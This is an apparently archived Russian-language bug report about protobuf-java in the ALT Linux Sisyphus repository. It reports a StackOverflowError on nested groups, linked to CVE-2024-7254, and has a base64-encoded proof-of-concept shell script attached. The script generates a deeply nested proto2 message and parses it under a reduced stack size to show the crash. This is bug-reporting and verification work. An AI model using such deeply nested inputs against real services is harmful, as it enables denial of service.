56306 2025-10-07 18:31:21 +0300 StackOverflowError при парсинге вложенных групп 2025-10-07 19:05:24 +0300 1 1 4 Development Sisyphus protobuf unstable x86_64 Linux ASSIGNED P5 normal --- 1 glinkinvd manowar grenka manowar root sbolshakov scala shaba qa-sisyphus oldest_to_newest 274062 0 19719 glinkinvd 2025-10-07 18:31:21 +0300 Created attachment 19719 скрипт Версия пакета: protobuf-java-3.25.5-alt6 Шаги воспроизведения: 1) Выполнить скрипт из вложения: $ ./exploit_cve_2024_7254_option1.sh Фактический результат: java.lang.StackOverflowError at java.base/java.lang.ClassLoader.addClass(ClassLoader.java:322) at java.base/java.lang.ClassLoader.defineClass1(Native Method) at java.base/java.lang.ClassLoader.defineClass(ClassLoader.java:1027) ... Ожидаемый результат: Выполнение без ошибок Дополнительно: На версии из p10 (protobuf-java-3.16.0-alt1.p10.4 (p10+382451.200.5.1)) данное поведение не воспроизводится. Складывается впечатление, будто пакет уязвим для CVE-2024-7254. 274066 1 manowar 2025-10-07 19:05:24 +0300 Спасибо за сообщение! А как будто специально исправляли... 19719 2025-10-07 18:31:21 +0300 2025-10-07 18:31:21 +0300 скрипт exploit_cve_2024_7254_option1.sh application/x-shellscript 3827 glinkinvd IyEvYmluL2Jhc2gKCnNldCAtZQoKV09SS19ESVI9JChta3RlbXAgLWQpCmNkICIkV09SS19ESVIi CgpjYXQgPDwnUFJPVE8nID50ZXN0X2V4cGxvaXQucHJvdG8Kc3ludGF4ID0gInByb3RvMiI7Cgpt ZXNzYWdlIFZ1bG5lcmFibGVNZXNzYWdlIHsKICBvcHRpb25hbCBncm91cCBMZXZlbDEgPSAxIHsK ICAgIG9wdGlvbmFsIGdyb3VwIExldmVsMiA9IDEgewogICAgICBvcHRpb25hbCBncm91cCBMZXZl bDMgPSAxIHsKICAgICAgICBvcHRpb25hbCBncm91cCBMZXZlbDQgPSAxIHsKICAgICAgICAgIG9w dGlvbmFsIGdyb3VwIExldmVsNSA9IDEgewogICAgICAgICAgICBvcHRpb25hbCBncm91cCBMZXZl bDYgPSAxIHsKICAgICAgICAgICAgICBvcHRpb25hbCBncm91cCBMZXZlbDcgPSAxIHsKICAgICAg ICAgICAgICAgIG9wdGlvbmFsIGdyb3VwIExldmVsOCA9IDEgewogICAgICAgICAgICAgICAgICBv cHRpb25hbCBncm91cCBMZXZlbDkgPSAxIHsKICAgICAgICAgICAgICAgICAgICBvcHRpb25hbCBn cm91cCBMZXZlbDEwID0gMSB7CiAgICAgICAgICAgICAgICAgICAgICBvcHRpb25hbCBncm91cCBM ZXZlbDExID0gMSB7CiAgICAgICAgICAgICAgICAgICAgICAgIG9wdGlvbmFsIGdyb3VwIExldmVs MTIgPSAxIHsKICAgICAgICAgICAgICAgICAgICAgICAgICBvcHRpb25hbCBncm91cCBMZXZlbDEz ID0gMSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcHRpb25hbCBncm91cCBMZXZlbDE0 ID0gMSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9wdGlvbmFsIGdyb3VwIExldmVs MTUgPSAxIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcHRpb25hbCBncm91cCBM ZXZlbDE2ID0gMSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcHRpb25hbCBn cm91cCBMZXZlbDE3ID0gMSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9w dGlvbmFsIGdyb3VwIExldmVsMTggPSAxIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICBvcHRpb25hbCBncm91cCBMZXZlbDE5ID0gMSB7CiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICBvcHRpb25hbCBncm91cCBMZXZlbDIwID0gMSB7CiAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9wdGlvbmFsIGdyb3VwIExldmVsMjEg PSAxIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcHRpb25h bCBncm91cCBMZXZlbDIyID0gMSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICBvcHRpb25hbCBncm91cCBMZXZlbDIzID0gMSB7CiAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9wdGlvbmFsIGdyb3VwIExldmVsMjQgPSAx IHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcHRp b25hbCBncm91cCBMZXZlbDI1ID0gMSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICBvcHRpb25hbCBncm91cCBMZXZlbDI2ID0gMSB7CiAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9wdGlvbmFsIGdy b3VwIExldmVsMjcgPSAxIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgb3B0aW9uYWwgaW50MzIgZHVtbXkgPSAxOwogICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgfQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICB9CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAg ICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICAgICAgfQogICAgICAg ICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAg ICAgICAgfQogICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAg ICAgfQogICAgICAgICAgICB9CiAgICAgICAgICB9CiAgICAgICAgfQogICAgICB9CiAgICB9CiAg fQp9ClBST1RPCgpta2RpciAtcCBjb20vZXhhbXBsZQpwcm90b2MgLS1qYXZhX291dD1jb20vZXhh bXBsZSB0ZXN0X2V4cGxvaXQucHJvdG8KYXdrICdCRUdJTiB7cHJpbnQgInBhY2thZ2UgY29tLmV4 YW1wbGU7In0ge3ByaW50fScgY29tL2V4YW1wbGUvVGVzdEV4cGxvaXQuamF2YSA+IGNvbS9leGFt cGxlL3RlbXAKbXYgY29tL2V4YW1wbGUvdGVtcCBjb20vZXhhbXBsZS9UZXN0RXhwbG9pdC5qYXZh CgpKQVJfUEFUSD0iL3Vzci9zaGFyZS9qYXZhL3Byb3RvYnVmL3Byb3RvYnVmLWphdmEuamFyIiAj INCf0YPRgtGMINC6INGC0LXRgdGC0LjRgNGD0LXQvNC+0LzRgyBSUE0t0L/QsNC60LXRgtGDCmph dmFjIC1jcCAiJEpBUl9QQVRIOi4iIC4vY29tL2V4YW1wbGUvVGVzdEV4cGxvaXQuamF2YSA+L2Rl di9udWxsIDI+JjEKCmNhdCA8PCdKQVZBJyA+VGVzdFZ1bG5lcmFiaWxpdHkuamF2YQppbXBvcnQg Y29tLmV4YW1wbGUuVGVzdEV4cGxvaXQuVnVsbmVyYWJsZU1lc3NhZ2U7CgpwdWJsaWMgY2xhc3Mg VGVzdFZ1bG5lcmFiaWxpdHkgewogICAgcHVibGljIHN0YXRpYyB2b2lkIG1haW4oU3RyaW5nW10g YXJncykgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIC8vINCS0YvQt9GL0LLQsNC10Lwg0L/Q sNGA0YHQuNC90LMgKNCyINGD0Y/Qt9Cy0LjQvNGL0YUg0LLQtdGA0YHQuNGP0YUg0LzQvtC20LXR giDQv9GA0LjQstC10YHRgtC4INC6IHN0YWNrIG92ZXJmbG93KQogICAgICAgICAgICBWdWxuZXJh YmxlTWVzc2FnZSBtZXNzYWdlID0gVnVsbmVyYWJsZU1lc3NhZ2UucGFyc2VGcm9tKG5ldyBieXRl WzBdKTsKICAgICAgICAgICAgU3lzdGVtLm91dC5wcmludGxuKCJQYXJzaW5nIHN1Y2NlZWRlZCAo bm90IHZ1bG5lcmFibGU/KSIpOwogICAgICAgIH0gY2F0Y2ggKFRocm93YWJsZSB0KSB7CiAgICAg ICAgICAgIFN5c3RlbS5lcnIucHJpbnRsbigiRXhjZXB0aW9uIGR1cmluZyBwYXJzaW5nIChwb3Rl bnRpYWwgdnVsbmVyYWJpbGl0eSBkZXRlY3RlZCk6Iik7CiAgICAgICAgICAgIHQucHJpbnRTdGFj a1RyYWNlKCk7CiAgICAgICAgfQogICAgfQp9CkpBVkEKCmphdmFjIC1jcCAiJEpBUl9QQVRIOi4i IFRlc3RWdWxuZXJhYmlsaXR5LmphdmEKamF2YSAtWHNzMTM3ayAtY3AgIiRKQVJfUEFUSDouIiBU ZXN0VnVsbmVyYWJpbGl0eQoKZWNobyAi0KLQtdGB0YIg0LfQsNCy0LXRgNGI0LXQvS4g0J/RgNC+ 0LLQtdGA0YzRgtC1INCy0YvQstC+0LQg0L3QsCDQvdCw0LvQuNGH0LjQtSBTdGFja092ZXJmbG93 RXJyb3IuIgo=